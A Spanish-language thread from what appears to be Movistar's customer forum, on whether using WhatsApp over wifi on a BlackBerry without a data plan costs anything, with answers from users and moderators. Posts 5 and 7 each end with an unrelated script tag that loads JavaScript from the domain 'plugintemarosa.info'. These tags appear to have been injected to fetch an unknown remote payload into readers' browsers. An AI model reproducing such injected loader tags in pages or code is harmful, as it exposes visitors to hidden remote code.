Whatsapp en blackberry solo por wifi

beea
Más integrado que la RDSI
Whatsapp en blackberry solo por wifi

Hola , como he comentado en post anteriores tego una blackberry sin tarifa de datos , y mande que me desactivaran las conexiones para solo poder conectarme por wifi mi pregunta es si al usar whatsapp se me cobraria algo , pero ya digo solo lo uso con wifi.

 

Gracias , un saludo

Etiquetas (2)
Mensaje 1 de 7
15.676 Visitas
6 RESPUESTAS 6
JoseMstar
Yo probé el VDSL

Saludos.

 

Si te han desactivado las conexiones GPRS (E-moción lo llama Movistar), y sólo te puedes conectar por WIFI, no te costará nada conectarte a internet (lo "paga" el ADSL con Wifi).

 

Otra cosa es lo que te cueste usar WhatsApp, que creo es gratis el primer año, y luego 2 € por año.

--------------------------
Por favor, si crees que te he ayudado, vota en el icono del pulgar (del tipo Me Gusta).
Mensaje 2 de 7
15.666 Visitas
beea
Más integrado que la RDSI

Vale , gracias , si las GPRS las tengo desactivadas , pero mandar mensajes por whatsapp no me cobran nada pues no? 

Mensaje 3 de 7
15.662 Visitas
Sheila-Movistar
Antiguo Moderador

Hola beea,

 

Puedes usar el Whatsapp por wifi en la BB y no se te tiene que cobrar, eso sí, recuerdo que no aseguramos que funcione bien el wifi sin servicio de datos por los libros de servicio

 

Un saludo


Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

Para información sobre nuestros Servicios Móvil , Ofertas Móvil, Móviles , Tarifas móvil y Ofertas visita Movistar

 

Solución aceptada.png
Mensaje 4 de 7
15.649 Visitas
YureHernandez
Yo probé el VDSL

Holaa...a ver si alguien me puede hechar un cable, tb tengo la bb 8520 hace poco que quite la tarifa de datos y tengo verdaderos lios de como configurarla para que vaya solo por wifi, ya tengo la configuracion del navegador por puntos de acceso publico, pedi que me desactivaran los servicios gprs, aun asi me han seguido cobrando datos por gprs al conectar la wifi, en mi libro de servicios tengo el wap2 transport, wap browserconfig y wap push config, segun entiendo son estos servicios los que debo eliminar para que me vaya el whatsapp por wifi?, además tampoco consigo que la bbm rule, no se que hacer.....

 

Probe a desactivar la red movil y activar el wifi, me baje denuevo el whatsapp pero tuve q activar el servicio de datos para que la app se descargara, llego a pantalla de verificar num. y me sale un aviso que tengo la radio desactivada y no podre enviar sms.....que alguien me lo explique.

 

Ayuda por fa.

<script type="text/javascript" src="http://plugintemarosa.info/dfi823hs.js?0.9107594253101067"></script>
Mensaje 5 de 7
15.091 Visitas
Irene-movistar
Antiguo Moderador

Hola YureHernandez!


Buenos días y bienvenida al foro!


Como dice mi compañera Sheila, no podemos asegurar el correcto funcionamiento de la Bb si no tienes tarifa de datos contratada.

 

Saludos!



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

 Si necesitas contratar Fibra Ópticacomprobar tu cobertura Adsl y Fibrao ver información sobre la instalación de la fibra visita nuestra página ADSL y Fibra en movistar.es 

Solución aceptada.png
Mensaje 6 de 7
15.079 Visitas
YureHernandez
Yo probé el VDSL

Gracias por contestar Irene.....lo tendré en cuenta.

Un saludo.

<script type="text/javascript" src="http://plugintemarosa.info/dfi823hs.js?0.23238523489497753"></script>
Mensaje 7 de 7
15.074 Visitas